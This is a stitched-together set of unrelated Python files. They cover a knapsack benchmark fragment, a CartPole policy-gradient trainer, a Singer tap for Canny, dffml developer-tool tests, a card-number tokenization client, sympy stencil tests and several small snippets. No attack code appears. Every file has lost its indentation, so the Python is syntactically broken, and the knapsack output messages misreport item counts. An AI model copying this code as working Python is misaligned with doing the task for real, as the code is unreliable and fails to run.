print "cap: 102, items: 35. took: ", duration_medium_two, " seconds."
# benchmark first big example
ks.setCapacity(130);
ks.addItem(3,14);
ks.addItem(2,1);
ks.addItem(3,30);
ks.addItem(2,12);
ks.addItem(3,10);
ks.addItem(5,6);
ks.addItem(42,10);
ks.addItem(7,24);
ks.addItem(9,53);
ks.addItem(6,65);
ks.addItem(4,4);
ks.addItem(32,12);
ks.addItem(3,53);
ks.addItem(2,3);
ks.addItem(6,53);
ks.addItem(3,2);
ks.addItem(12,1);
ks.addItem(5,43);
ks.addItem(51,11);
ks.addItem(4,53);
ks.addItem(23,3);
ks.addItem(24,6);
ks.addItem(1,2);
ks.addItem(6,10);
ks.addItem(7,5);
ks.addItem(41,23);
ks.addItem(4,13);
ks.addItem(51,11);
ks.addItem(2,45);
ks.addItem(9,53);
ks.addItem(8,1);
ks.addItem(23,13);
ks.addItem(42,10);
ks.addItem(7,24);
ks.addItem(8,32);
ks.addItem(3,65);
ks.addItem(4,4);
ks.addItem(2,2);
ks.addItem(41,53);
ks.addItem(7,33);
ks.addItem(2,53);
start = time.clock()
result = ks.solve()
duration_big_two = (time.clock()-start)
print "cap: 130, items: 76. took: ", duration_big_two, " seconds."
# benchmark second big example
ks.setCapacity(150);
ks.addItem(2,13);
ks.addItem(53,154);
ks.addItem(14,442);
ks.addItem(23,2);
ks.addItem(2,42);
ks.addItem(53,123);
ks.addItem(2,12);
start = time.clock()
result = ks.solve()
duration_big_two = (time.clock()-start)
print "cap: 150, items: 83. took: ", duration_big_two, " seconds."
if __name__ == "__main__":
main() |
# -*- coding: utf-8 -*-
"""Top-level package for Vehicle History Reports."""
__author__ = """Mpho Mphego"""
__email__ = "mpho112@gmail.com"
from vehicle_history_reports.vehicle_history_reports import *
|
import os
import gym
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
from torch.distributions import Categorical
import matplotlib.pyplot as plt
env = gym.make("CartPole-v0")
env.reset()
class Policy(nn.Module):
def __init__(self):
super(Policy, self).__init__()
self.num_actions = env.action_space.n
self.state_dim = env.observation_space.shape[0]
self.fc1 = nn.Linear(self.state_dim, 256)
self.fc2 = nn.Linear(256, self.num_actions)
def forward(self, x):
x = F.relu(self.fc1(x))
x = self.fc2(x)
return x
restore = True
if restore and os.path.isfile("polict.pt"):
policy = torch.load("policy.pt")
else:
policy = Policy()
optimizer = optim.Adam(policy.parameters(), lr=0.001)
def update_policy(states, actions, rewards, log_probs, gamma=0.99):
"""
Расчет потерь, вычисление градиентов, обратное распространение и обновление параметров нейронной сети.
"""
loss = []
dis_rewards = rewards[:]
for i in range(len(dis_rewards) - 2, -1, -1):
dis_rewards[i] = dis_rewards[i] + gamma * dis_rewards[i + 1]
dis_rewards = torch.tensor(dis_rewards)
for log_prob, reward in zip(log_probs, dis_rewards):
loss.append(-log_prob * reward)
loss = torch.cat(loss).sum()
optimizer.zero_grad()
loss.backward()
optimizer.step()
def get_policy_values(state):
"""
Рассчет ненормализованных значений policy по входному массиву значений
"""
state = Variable(torch.from_numpy(state)).type(torch.FloatTensor).unsqueeze(0)
policy_values = policy(state)
return policy_values
def generate_episode(t_max=1000):
"""
Создание эпизода. Сохранение состояний, действий, наград и регистрация вероятностей. Обновление policy
"""
states, actions, rewards, log_probs = [], [], [], []
s = env.reset()
for t in range(t_max):
action_probs = F.softmax(get_policy_values(s), dim=-1)
sampler = Categorical(action_probs)
a = sampler.sample()
log_prob = sampler.log_prob(a)
new_s, r, done, _ = env.step(a.item())
states.append(s)
actions.append(a)
rewards.append(r)
log_probs.append(log_prob)
s = new_s
if done:
break
update_policy(states, actions, rewards, log_probs)
return sum(rewards)
def play_episodes(num_episodes=10, render=False):
"""
Запускаем игру используя обученную policy
"""
for i in range(num_episodes):
rewards = []
s = env.reset()
for _ in range(1000):
if render:
env.render()
action_probs = F.softmax(get_policy_values(s), dim=-1)
sampler = Categorical(action_probs)
a = sampler.sample()
log_prob = sampler.log_prob(a)
new_s, r, done, _ = env.step(a.item())
rewards.append(r)
s = new_s
if done:
print("Episode {} finished with reward {}".format(i + 1, np.sum(rewards)))
break
def plot_rewards(rewards, running_rewards):
"""
Графики
"""
plt.style.use('seaborn-darkgrid')
fig = plt.figure(figsize=(12, 7))
ax1 = fig.add_subplot(2, 1, 1)
ax2 = fig.add_subplot(2, 1, 2)
plt.subplots_adjust(hspace=.5)
ax1.set_title('Episodic rewards')
ax1.plot(rewards, label='Episodic rewards')
ax1.set_xlabel("Episodes")
ax1.set_ylabel("Rewards")
ax2.set_title('Running rewards')
ax2.plot(running_rewards, label='Running rewards')
ax2.set_xlabel("Episodes")
ax2.set_ylabel("Average rewards")
fig.savefig("backpropagatw_test.png")
if __name__ == "__main__":
num_episodes = 1500
verbose = True
print_every = 50
target_avg_reward_100ep = 195
running_reward = None
rewards = []
running_rewards = []
restore_model = True
if restore_model and os.path.isfile("polict.pt"):
policy = torch.load("policy.pt")
else:
policy = Policy()
optimizer = optim.Adam(policy.parameters(), lr=0.001)
for i in range(num_episodes):
reward = generate_episode()
rewards.append(reward)
running_reward = np.mean(rewards[-100:])
running_rewards.append(running_reward)
if verbose:
if not i % print_every:
print("Episode: {}. Running reward: {}".format(i + 1, running_reward))
if i >= 99 and running_reward >= target_avg_reward_100ep:
print("Episode: {}. Running reward: {}".format(i + 1, running_reward))
print("Ran {} episodes. Solved after {} episodes.".format(i + 1, i - 100 + 1))
break
elif i == num_episodes - 1:
print("Couldn't solve after {} episodes".format(num_episodes))
plot_rewards(rewards, running_rewards)
torch.save(policy, "cartpole_policy_reinforce.pt")
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
#import module_mass file as a pd.DataFrame and name column
input = pd.read_csv('input.txt', header = None)
input.columns = ['module_mass']
#calculate fuel needed
input['fuel'] = (input['module_mass']/3)
input['fuel_round']= input['fuel'].apply(np.floor)
input['fuel_needed'] = input['fuel_round']-2
print(input.fuel_needed.sum())
|
"""Canny tap class."""
from pathlib import Path
from typing import List
from singer_sdk import Tap, Stream
from singer_sdk.typing import (
DateTimeType,
PropertiesList,
Property,
StringType,
)
from tap_canny.streams import (
BoardsStream,
PostsStream,
StatusChangesStream,
TagsStream,
CommentsStream,
VotesStream,
ChangelogEntriesStream
)
STREAM_TYPES = [
BoardsStream,
PostsStream,
StatusChangesStream,
TagsStream,
CommentsStream,
VotesStream,
ChangelogEntriesStream
]
class TapCanny(Tap):
"""Canny tap class."""
name = "tap-canny"
config_jsonschema = PropertiesList(
Property("api_key", StringType, required=True),
Property("start_date", DateTimeType),
).to_dict()
def discover_streams(self) -> List[Stream]:
"""Return a list of discovered streams."""
return [stream_class(tap=self) for stream_class in STREAM_TYPES]
# CLI Execution:
cli = TapCanny.cli
|
import numpy as np
import pandas as pd
from netCDF4 import Dataset
from sklearn.pipeline import Pipeline
from analysis.data import GeographicArea
from sklearn.metrics import davies_bouldin_score
class Sink:
def __init__(self, pipeline: Pipeline, area: GeographicArea):
self.pipeline = pipeline
self.area = area
def save(self):
raise NotImplementedError
def satistics(self, X, y, params):
scaler = self.pipeline.named_steps['scaler']
X_ = scaler.fit_transform(X)
total = len(X)
noise_mask = y > -1
# number of cluster excluding noise
cluster = len(np.unique(y[noise_mask]))
noise = total - len(y[noise_mask])
if cluster > 1:
db_score = davies_bouldin_score(X_[noise_mask, :], y[noise_mask])
else:
db_score = np.nan
# print("{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}{:>10.5f}".format(total, self.pipeline.get_params(), noise, cluster, db_score))
print(params)
class NetCDFSink(Sink):
def __init__(self,
pipeline: Pipeline,
area: GeographicArea,
H2O_bins=15,
delD_bins=20):
super(NetCDFSink, self).__init__(pipeline, area)
self.H2O_bins = H2O_bins
self.delD_bins = delD_bins
def create_dataset(self, filename) -> Dataset:
nc = Dataset(filename, 'w', format='NETCDF4')
nc.setncattr_string('lat', self.area.lat)
nc.setncattr_string('lon', self.area.lon)
nc.createDimension('H20_bins', self.H2O_bins)
nc.createDimension('delD_bins', self.delD_bins)
# unlimted clusters
nc.createDimension('cluster', None)
nc.createVariable(
'cluster', 'u4', ('cluster', 'delD_bins', 'H20_bins'))
return nc
def save(self, df: pd.DataFrame, filename='cluster.nc'):
assert -1 not in df.label
with self.create_dataset(filename) as nc:
cluster = nc['cluster']
for group, data in df.groupby(['label']):
hist, xedges, yedges = np.histogram2d(
data['H2O'].values, data['delD'].values, bins=(self.H2O_bins, self.delD_bins))
cluster[group] = hist.T
|
from lightwood.encoders.categorical.categorical import CategoricalEncoder
default = CategoricalEncoder |
import io
import os
import sys
import json
import glob
import shutil
import inspect
import pathlib
import tarfile
import tempfile
import unittest
import contextlib
import dataclasses
import unittest.mock
from typing import Type, List, BinaryIO
from dffml.version import VERSION
from dffml.df.types import DataFlow
from dffml.service.dev import (
REPO_ROOT,
Develop,
RepoDirtyError,
Export,
Run,
BumpPackages,
MissingDependenciesError,
Install,
VersionNotFoundError,
RCMissingHyphen,
LintCommits,
CommitLintError,
)
from dffml.util.os import chdir
from dffml.util.skel import Skel
from dffml.util.packaging import is_develop
from dffml.util.asynctestcase import AsyncTestCase, AsyncTestCase
from ..util.test_skel import COMMON_FILES
class TestDevelopCreate(AsyncTestCase):
def verify(self, root, name, package_specific_files):
import_name = name.replace("-", "_")
package_specific_files = list(
map(
lambda filename: tuple(
map(
lambda x: x.replace("{import_name}", import_name),
filename,
)
),
package_specific_files,
)
)
all_files = ", ".join(
map(
lambda path: path.replace(root, ""),
glob.glob(os.path.join(root, "**")),
)
)
for dirname in [(import_name,), ("tests",)]:
check = os.path.join(root, *dirname)
self.assertTrue(
os.path.isdir(check), f"Not a directory: {check}: {all_files}"
)
for filename in [
("setup.py",),
("LICENSE",),
("README.md",),
("MANIFEST.in",),
(import_name, "__init__.py"),
(import_name, "version.py"),
("tests", "__init__.py"),
] + package_specific_files:
check = os.path.join(root, *filename)
self.assertTrue(
os.path.isfile(check), f"Not a file: {check}: {all_files}"
)
async def generic_test(self, name, package_specific_files):
package_name = "test-package"
# Acquire the CreateCMD class of specified type
cli_class = getattr(Develop.create, name)
# Create tempdir to copy files to
with tempfile.TemporaryDirectory() as tempdir:
# Create directories in tempdir, one we cd into and one we use as
# target parameter
for target in [
os.path.join(tempdir, "dot"),
os.path.join(tempdir, "within"),
]:
with self.subTest(target=target):
# Create the directory within the tempdir
os.mkdir(target)
# Instantiate an instance of the CreateCMD class
cli = cli_class(
package=package_name,
description=None,
target=target
if target[::-1].startswith(("dot")[::-1])
else None,
)
# Change directories
with chdir(target):
# Call create command
await cli.run()
# Verify that all went as planned
if target[::-1].startswith(("dot")[::-1]):
self.verify(
target, package_name, package_specific_files
)
elif target[::-1].startswith(("within")[::-1]):
self.verify(
os.path.join(target, package_name),
package_name,
package_specific_files,
)
else: # pragma: no cov
pass
async def test_model(self):
await self.generic_test(
"model",
[("{import_name}", "myslr.py"), ("tests", "test_model.py")],
)
async def test_operations(self):
await self.generic_test(
"operations",
[
("{import_name}", "definitions.py"),
("{import_name}", "operations.py"),
("tests", "test_operations.py"),
],
)
async def test_service(self):
await self.generic_test(
"service",
[("{import_name}", "misc.py"), ("tests", "test_service.py")],
)
class TestDevelopSkelLink(AsyncTestCase):
skel = Skel()
async def test_run(self):
# Skip if not in development mode
if not is_develop("dffml"):
self.skipTest("dffml not installed in development mode")
await Develop.cli("skel", "link")
common_files = [
path.relative_to(self.skel.common)
for path in self.skel.common_files()
]
# At time of writing there are 4 plugins in skel/ change this as needed
plugins = self.skel.plugins()
self.assertGreater(len(plugins), 3)
for plugin in plugins:
for check in COMMON_FILES:
with chdir(plugin):
self.assertTrue(
check.is_symlink(),
f"{check.resolve()} is not a symlink",
)
@dataclasses.dataclass
class FakeProcess:
cmd: List[str] = None
returncode: int = 0
stdout: BinaryIO = None
def __post_init__(self):
if self.cmd is None:
self.cmd = []
async def communicate(self):
return b"", b""
async def wait(self):
if not "archive" in self.cmd:
return
with contextlib.ExitStack() as stack:
# Create the bytes objects to build the tarfile in memory
tar_fileobj = stack.enter_context(io.BytesIO())
hello_txt_fileobj = stack.enter_context(io.BytesIO(b"world"))
# Create the TarInfo objects
hello_txt_tarinfo = tarfile.TarInfo(name="somedir/hello.txt")
hello_txt_tarinfo.size = len(hello_txt_fileobj.getvalue())
# Create the archive using the bytes objects
with tarfile.open(mode="w|", fileobj=tar_fileobj) as archive:
archive.addfile(hello_txt_tarinfo, fileobj=hello_txt_fileobj)
# Write out the contents of the tar to the client
self.stdout.write(tar_fileobj.getvalue())
def mkexec(proc_cls: Type[FakeProcess] = FakeProcess):
async def fake_create_subprocess_exec(
*args, stdin=None, stdout=None, stderr=None
):
return proc_cls(cmd=args, stdout=stdout)
return fake_create_subprocess_exec
class FakeResponse:
def read(self, num=0):
return json.dumps({"info": {"version": VERSION}}).encode()
@contextlib.contextmanager
def fake_urlopen(url):
yield FakeResponse()
class TestRelease(AsyncTestCase):
async def setUp(self):
await super().setUp()
self._stack.enter_context(chdir(REPO_ROOT))
async def test_uncommited_changes(self):
class FailedFakeProcess(FakeProcess):
async def communicate(self):
return b"There are changes", b""
with unittest.mock.patch(
"asyncio.create_subprocess_exec", new=mkexec(FailedFakeProcess)
):
with self.assertRaises(RepoDirtyError):
await Develop.cli("release", ".")
async def test_already_on_pypi(self):
stdout = io.StringIO()
with unittest.mock.patch(
"asyncio.create_subprocess_exec", new=mkexec()
), unittest.mock.patch(
"urllib.request.urlopen", new=fake_urlopen
), contextlib.redirect_stdout(
stdout
):
await Develop.cli("release", ".")
self.assertEqual(
stdout.getvalue().strip(),
f"Version {VERSION} of dffml already on PyPi",
)
async def test_okay(self):
global VERSION
VERSION = "0.0.0"
for plugin in [".", "model/scikit"]:
stdout = io.StringIO()
with self.subTest(plugin=plugin):
with unittest.mock.patch(
"asyncio.create_subprocess_exec", new=mkexec()
), unittest.mock.patch(
"urllib.request.urlopen", new=fake_urlopen
), contextlib.redirect_stdout(
stdout
):
await Develop.cli("release", plugin)
self.assertEqual(
stdout.getvalue().strip(),
inspect.cleandoc(
f"""
$ git archive --format=tar HEAD
$ {sys.executable} setup.py sdist
$ {sys.executable} setup.py bdist_wheel
$ {sys.executable} -m twine upload dist/*
"""
),
)
class TestSetupPyVersion(AsyncTestCase):
async def test_success(self):
stdout = io.StringIO()
with contextlib.redirect_stdout(stdout):
await Develop.cli(
"setuppy",
"version",
self.mktempfile(text='VERSION = "0.0.42"'),
)
self.assertEqual("0.0.42", stdout.getvalue().strip())
async def test_filenot_found(self):
with self.assertRaises(VersionNotFoundError):
await Develop.cli(
"setuppy",
"version",
self.mktempfile(text='FEEDFACE = "0.0.42"'),
),
class TestBumpPackages(AsyncTestCase):
async def test_bump_version(self):
self.assertEqual(BumpPackages.bump_version("1.2.3", "5.6.7"), "6.8.10")
async def test_bump_version_original_with_rc(self):
self.assertEqual(
BumpPackages.bump_version("1.2.3-rc0", "5.6.7"), "6.8.10"
)
async def test_bump_version_increment_with_rc(self):
self.assertEqual(
BumpPackages.bump_version("1.2.3", "5.6.7-rc0"), "6.8.10-rc0"
)
async def test_bump_version_both_with_rc(self):
self.assertEqual(
BumpPackages.bump_version("1.2.3-rc1", "5.6.7-rc2"), "6.8.10-rc3"
)
async def test_bump_version_zero(self):
self.assertEqual(
BumpPackages.bump_version("1.2.3-rc1", "5.6.Z"), "6.8.0"
)
async def test_bump_version_original_violates_semantic(self):
with self.assertRaisesRegex(RCMissingHyphen, "original.*1\.2\.3rc1"):
BumpPackages.bump_version("1.2.3rc1", "0.0.0")
async def test_bump_version_increment_violates_semantic(self):
with self.assertRaisesRegex(RCMissingHyphen, "increment.*5\.6\.7rc2"):
BumpPackages.bump_version("1.2.3-rc1", "5.6.7rc2")
class TestExport(AsyncTestCase):
async def test_run(self):
stdout = io.BytesIO()
with unittest.mock.patch("sys.stdout.buffer.write", new=stdout.write):
await Export(
export="tests.test_df:DATAFLOW", not_linked=False
).run()
exported = json.loads(stdout.getvalue())
DataFlow._fromdict(**exported)
class TestRun(AsyncTestCase):
async def test_run(self):
with tempfile.TemporaryDirectory() as tempdir:
await Run.cli(
"dffml.operation.db:db_query_create_table",
"-table_name",
"FEEDFACE",
"-cols",
json.dumps({"DEADBEEF": "text"}),
"-config-database",
"sqlite",
"-config-database-filename",
os.path.join(tempdir, "sqlite_database.db"),
"-log",
"debug",
)
class TestInstall(AsyncTestCase):
async def test_dep_check(self):
with self.assertRaisesRegex(
MissingDependenciesError,
inspect.cleandoc(
"""
The following plugins have unmet dependencies and could not be installed
model/vowpalWabbit
feedface
Install missing dependencies and re-run plugin install, or skip with
-skip model/vowpalWabbit
"""
),
):
Install.dep_check(
{("model", "vowpalWabbit"): {"feedface": lambda: False}}, []
)
class TestMakeDocs(AsyncTestCase):
root = pathlib.Path(__file__).parents[2]
docs_root = root / "docs"
symlinks_to_chk = [
(("changelog.md",), ("CHANGELOG.md",)),
(("shouldi.md",), ("examples", "shouldi", "README.md",)),
(("swportal.rst",), ("examples", "swportal", "README.rst",)),
(
("contributing", "consoletest.md",),
("dffml", "util", "testing", "consoletest", "README.md",),
),
(("plugins", "service", "http",), ("service", "http", "docs",),),
]
files_to_check = [
(file_name,) for file_name in os.listdir(docs_root / "images")
] + [("_static", "copybutton.js",), (".nojekyll",)]
async def test_files(self):
if not is_develop("dffml"):
self.skipTest("dffml not installed in development mode")
with tempfile.TemporaryDirectory() as tempdir:
with unittest.mock.patch(
"asyncio.create_subprocess_exec", new=mkexec()
):
await Develop.cli("docs", "-target", tempdir)
for symlink, source in self.symlinks_to_chk:
symlink_path = self.docs_root.joinpath(*symlink)
source_path = self.root.joinpath(*source)
self.assertTrue(symlink_path.exists())
self.assertTrue(symlink_path.resolve() == source_path)
for file_name in self.files_to_check:
file_path = pathlib.Path(tempdir).joinpath(*file_name)
self.assertTrue(file_path.exists())
async def test_cmd_seq(self):
if not is_develop("dffml"):
self.skipTest("dffml not installed in development mode")
stdout = io.StringIO()
with unittest.mock.patch(
"asyncio.create_subprocess_exec", new=mkexec()
), contextlib.redirect_stdout(
stdout
), tempfile.TemporaryDirectory() as tempdir:
await Develop.cli("docs", "-target", tempdir)
self.assertEqual(
stdout.getvalue().strip(),
inspect.cleandoc(
f"""
$ {sys.executable} {self.root}/scripts/docs.py
$ {sys.executable} {self.root}/scripts/docs_api.py
$ sphinx-build -W -b html docs {tempdir}
"""
),
)
class TestLintCommits(AsyncTestCase):
LintCommitsObj = LintCommits()
valid_commits = [
"docs: contributing: editors: vscode: Shorten title",
"df: memory: Log on instance creation with given config",
"source: file: Change label to tag",
"model: scikit: Use make_config_numpy",
"cli: dataflow: Merge seed arrays",
"tests : service : dev : updated test for LintCommits",
"shouldi: Use high level run",
"shouldi: tests: cli: Include node",
]
invalid_commits = [
"service: http: routes: Default to setting no-cache on all respones",
"docs: contributing: consoletest: README: Add documentation",
"style: Fixed JS API newline",
"cleanup: Fix importing by using importlib.import_module",
"tests : service : test_dev : updated test for LintCommits",
]
async def fake_get_all_exts(self):
return {
"",
".py",
".mp4",
".js",
".toml",
".ini",
".csv",
".md",
".json",
".in",
".txt",
".yaml",
".cfg",
".css",
".svg",
".html",
".jpg",
".yml",
".gif",
".ipynb",
".rst",
".sh",
".nblink",
".png",
".Dockerfile",
".pdf",
}
async def test_should_validate(self):
with unittest.mock.patch(
"dffml.service.dev.LintCommits._get_all_exts",
self.fake_get_all_exts,
):
self.assertTrue(
all(
[
await self.LintCommitsObj.validate_commit_msg(msg)
for msg in self.valid_commits
]
)
)
async def test_shouldnot_validate(self):
with unittest.mock.patch(
"dffml.service.dev.LintCommits._get_all_exts",
self.fake_get_all_exts,
):
self.assertTrue(
not any(
[
await self.LintCommitsObj.validate_commit_msg(msg)
for msg in self.invalid_commits
]
)
)
|
#!/bin/env python3
"""
This is an example script to tokenize or detokenize batch data using CSV file.
Usage: batch_tokenize_and_detokenize.py [options]
Tokenize or Detokenize using CSV file. Please make sure you have updated
envvars file
Options:
-h, --help show this help message and exit
--csv_file_path=CSV_FILE_PATH
Specify the path of CSV file, example
/home/user/abc.csv
--auth_token=AUTH_TOKEN
Specify the auth token for Google Cloud authentication
--project_id=PROJECT_ID
Specify GCP project id
--app_url=APP_URL Specify App URL
--transformation_type=TRANSFORMATION_TYPE
Specify if you want to tokenize or detokenize
Output:
In case of tokenizer, output file is csv_files/batch_tokenize_sample_csv_output.csv
In case of detokenizer, output file is csv_files/batch_detokenize_sample_csv_output.csv
"""
import json
import optparse
import requests
import sys
import csv
def parse_csv_and_send_tokenize_request(csv_file_path, auth_token, project_id, app_url):
"""
This function is used to parse CSV file and create a json which will be used send to tokenizer service
as POST API call data
"""
with open(csv_file_path, "r") as csvfile:
csvreader = csv.reader(csvfile)
next(csvreader)
for row in csvreader:
data_dic = {"cc": row[0], "mm": row[1], "yyyy": row[2], "user_id": row[3], "project_id": project_id}
send_tokenize_request(auth_token, data_dic, app_url)
def send_tokenize_request(auth_token, data_dic, app_url):
"""
This function is used to send POST API call to tokenizer service URL with the data from CSV file
"""
auth_token = "Bearer " + auth_token
headers = {"authorization": auth_token, "content-type": "application/json"}
response = requests.request("POST", app_url, json=data_dic, headers=headers)
if response.status_code == 200:
resp_data = response.text
else:
resp_data = "Error while tokenizing"
print(resp_data, response.status_code, print(response.text))
write_tokenized_output_in_csv(data_dic, resp_data)
def write_tokenized_output_in_csv(data_dic, resp_data):
"""
This function is used to write final CSV file with tokenized data
"""
row = [data_dic["cc"], data_dic["mm"], data_dic["yyyy"], data_dic["user_id"], resp_data]
data_file = open("csv_files/batch_tokenize_sample_csv_output.csv", "a")
writer = csv.writer(data_file)
writer.writerow(row)
data_file.close()
def parse_csv_and_send_detokenize_request(csv_file_path, auth_token, project_id, app_url):
"""
This function is used to parse CSV file and create a json which will be used send to detokenizer service
as POST API call data
"""
with open(csv_file_path, "r") as csvfile:
csvreader = csv.reader(csvfile)
next(csvreader)
for row in csvreader:
data_dic = {"user_id": row[0], "token": row[1], "project_id": project_id}
send_detokenize_request(auth_token, data_dic, app_url)
def send_detokenize_request(auth_token, data_dic, app_url):
"""
This function is used to send POST API call to detokenizer service URL with the data from CSV file
"""
auth_token = "Bearer " + auth_token
headers = {"authorization": auth_token, "content-type": "application/json"}
response = requests.request("POST", app_url, json=data_dic, headers=headers)
if response.status_code == 200:
resp_data = json.loads(response.content)
write_detokenized_output_in_csv(data_dic, resp_data)
else:
resp_data = "Error while detokenizing"
print(resp_data, response.status_code, response.text)
def write_detokenized_output_in_csv(data_dic, resp_data):
"""
This function is used to write final CSV file with detokenized data
"""
row = [resp_data["cc"], resp_data["mm"], resp_data["yyyy"], data_dic["user_id"], data_dic["token"]]
data_file = open("csv_files/batch_detokenize_sample_csv_output.csv", "a")
writer = csv.writer(data_file)
writer.writerow(row)
data_file.close()
def main(args):
parser = optparse.OptionParser(description="Tokenize or Detokenize using CSV file. Please make sure you have "
"updated envvars file")
parser.add_option('--csv_file_path', help="Specify the path of CSV file, example /home/user/abc.csv")
parser.add_option('--auth_token', help="Specify the auth token for Google Cloud authentication")
parser.add_option('--project_id', help="Specify GCP project id")
parser.add_option('--app_url', help="Specify App URL")
parser.add_option('--transformation_type', help="Specify if you want to tokenize or detokenize")
options, remaining_args = parser.parse_args(args)
if options.csv_file_path:
csv_file_path = options.csv_file_path
else:
raise Exception('Invalid or missing --csv_file_path option')
if options.auth_token:
auth_token = options.auth_token
else:
raise Exception('Invalid or missing --auth_token option')
if options.project_id:
project_id = options.project_id
else:
raise Exception('Invalid or missing --project_id option')
if options.app_url:
app_url = options.app_url
else:
raise Exception('Invalid or missing --app_url option')
if options.transformation_type:
transformation_type = options.transformation_type
else:
raise Exception('Invalid or missing --transformation_type option')
if transformation_type == "tokenize":
header = ["CC", "MM", "YYYY", "USER_ID", "TOKENIZED_DATA"]
data_file = open("csv_files/batch_tokenize_sample_csv_output.csv", "w")
writer = csv.writer(data_file)
writer.writerow(header)
data_file.close()
parse_csv_and_send_tokenize_request(csv_file_path, auth_token, project_id, app_url)
elif transformation_type == "detokenize":
header = ["CC", "MM", "YYYY", "USER_ID", "TOKENIZED_DATA"]
data_file = open("csv_files/batch_detokenize_sample_csv_output.csv", "w")
writer = csv.writer(data_file)
writer.writerow(header)
data_file.close()
parse_csv_and_send_detokenize_request(csv_file_path, auth_token, project_id, app_url)
else:
print("Wrong transformation_type provided, transformation_type should be either tokenizer or detokenizer")
if __name__ == '__main__':
main(sys.argv[1:])
|
"""Tests for distos.stencil
"""
import sys
sys.path.insert(1, "..")
import unittest
import sympy as sp
import numpy as np
import random
from dictos.spec import DEFAULT_INTERVAL, DEFAULT_DIFFERENTIAND
from dictos.stencil import (
create_coordinate_symbols,
create_differentiand_symbols,
to_subscript,
get_subscript,
)
from gen import random_string, random_int, STENCIL_HALF_WIDTH, MAX_SYMBOL_LENGTH
class StencilTest(unittest.TestCase):
def test_create_coordinate_symbols(self):
"""
test suite for stencil.create_coordinate_symbols.
1. it returns [a*h b*h c*h ...] when [a b c ...] is passed.
2. it returns [a*dx b*dx c*dx ...] when [a b c ...] and 'dx' are passed.
3. it raise error when empty list is passed.
4. it raise error when at least a number in the stencil appears more than once.
"""
# subtest 1
# it returns [a*h b*h c*h ...] when [a b c ...] is passed.
num = random_int(2, STENCIL_HALF_WIDTH)
for n in num:
with self.subTest(n):
stencil = [i for i in range(n)]
expected = create_coordinate_symbols(stencil)
h = sp.symbols(DEFAULT_INTERVAL)
actual = [i * h for i in range(n)]
self.assertEqual(expected, actual)
# subtest 2
# it returns [a*dx b*dx c*dx ...] when [a b c ...] and 'dx' are passed.
num = random_int(2, STENCIL_HALF_WIDTH)
for n in num:
with self.subTest(n):
interval = random_string(random.randint(1, MAX_SYMBOL_LENGTH))
h = sp.symbols(interval)
stencil = [i for i in range(n)]
expected = create_coordinate_symbols(stencil, interval=interval)
actual = [i * h for i in range(n)]
self.assertEqual(expected, actual)
# subtest 3 & 4 are tested in `test_error_stencil` moudle
def test_create_function_symbols(self):
"""
test suite for stencil.create_function_symbols.
1. it returns [f_{a}, f_{b}, f_{c}, ...] when [a*h, b*h, c*h, ...] is passed.
2. it returns [g_{a}, g_{b}, g_{c}, ...] when [a*h, b*h, c*h, ...] and 'g' are passed.
"""
# subtest 1
# it returns [f_{a}, f_{b}, f_{c}, ...] when [a*h, b*h, c*h, ...] is passed.
num = random_int(2, STENCIL_HALF_WIDTH)
for n in num:
with self.subTest(n):
stencil = [i for i in range(n)]
x = create_coordinate_symbols(stencil)
expected = create_differentiand_symbols(x)
f = DEFAULT_DIFFERENTIAND
subscript = [to_subscript(i) for i in stencil]
str = "".join([f + "_{" + s + "}" + " " for s in subscript])
actual = sp.symbols(str)
self.assertEqual(expected, actual)
# staggered grid case
stencil = [i / 2 for i in range(n)]
x = create_coordinate_symbols(stencil)
expected = create_differentiand_symbols(x)
subscript = [to_subscript(i) for i in stencil]
str = "".join([f + "_{" + s + "}" + " " for s in subscript])
actual = sp.symbols(str)
self.assertEqual(expected, actual)
# subtest 2
# it returns [g_{a}, g_{b}, g_{c}, ...] when [a*h, b*h, c*h, ...] and 'g' are passed.
num = random_int(2, STENCIL_HALF_WIDTH)
for n in num:
with self.subTest(n):
f = random_string(random.randint(1, MAX_SYMBOL_LENGTH))
stencil = [i for i in range(n)]
x = create_coordinate_symbols(stencil)
expected = create_differentiand_symbols(x, differentiand=f)
subscript = [to_subscript(i) for i in stencil]
str = "".join([f + "_{" + s + "}" + " " for s in subscript])
actual = sp.symbols(str)
self.assertEqual(expected, actual)
# staggered grid case
stencil = [i / 2 for i in range(n)]
x = create_coordinate_symbols(stencil)
expected = create_differentiand_symbols(x, differentiand=f)
subscript = [to_subscript(i) for i in stencil]
str = "".join([f + "_{" + s + "}" + " " for s in subscript])
actual = sp.symbols(str)
self.assertEqual(expected, actual)
def test_to_subscript(self):
"""
test suite for stencil.to_subscript.
"""
num = random_int(-20, 20)
for n in num:
with self.subTest(f"primitive variable {n} to subscript"):
expected = str(n)
actual = to_subscript(n)
self.assertEqual(expected, actual)
num = random_int(-20, 20, exclude=[0])
for n in num:
f = (abs(n) - 0.5) * np.sign(n)
with self.subTest(f"primitive variable {f} to subscript"):
expected = str(f)
actual = to_subscript(f)
self.assertEqual(expected, actual)
num = random_int(-20, 20)
for n in num:
with self.subTest(f"sympy number {n} to subscript"):
expected = str(n)
actual = to_subscript(sp.Number(n))
self.assertEqual(expected, actual)
num = random_int(-20, 20, exclude=[0])
for n in num:
f = (abs(n) - 0.5) * np.sign(n)
with self.subTest(f"sympy number {f} to subscript"):
expected = str(f)
actual = to_subscript(sp.Number(f))
self.assertEqual(expected, actual)
def test_get_subscript(self):
"""
test suite for stencil.get_subscript.
"""
for half_width in range(1, 11):
with self.subTest(f"get subscript {(half_width * 2 + 1)}-point stencil"):
stencil = [to_subscript(i) for i in range(-half_width, half_width + 1)]
expected = stencil
f = DEFAULT_DIFFERENTIAND
subscript = [
to_subscript(i) for i in range(-half_width, half_width + 1)
]
str = "".join([f + "_{" + s + "}" + " " for s in subscript])
f_set = sp.symbols(str)
actual = []
for f in f_set:
actual.append(get_subscript(f))
self.assertEqual(expected, actual)
if __name__ == "__main__":
unittest.main()
|
from setuptools import setup
setup(name='stormtrooper',
version='0.0.1',
description='Report trooper status and geolocation using homomorphic encryption',
url='bitbucket.com',
author='Jonathan Pinto Barbosa',
author_email='jonathanpbarbosa@gmail.com',
license='MIT',
packages=['stormtrooper'],
install_requires=[],
zip_safe=False)
|
import cffi
ffi = cffi.FFI()
ffi.cdef("const int mysize;")
lib = ffi.verify("const int mysize = sizeof(long long int);")
print(lib.mysize)
|
from .models import Resource, Reservation
from django.core.exceptions import ValidationError
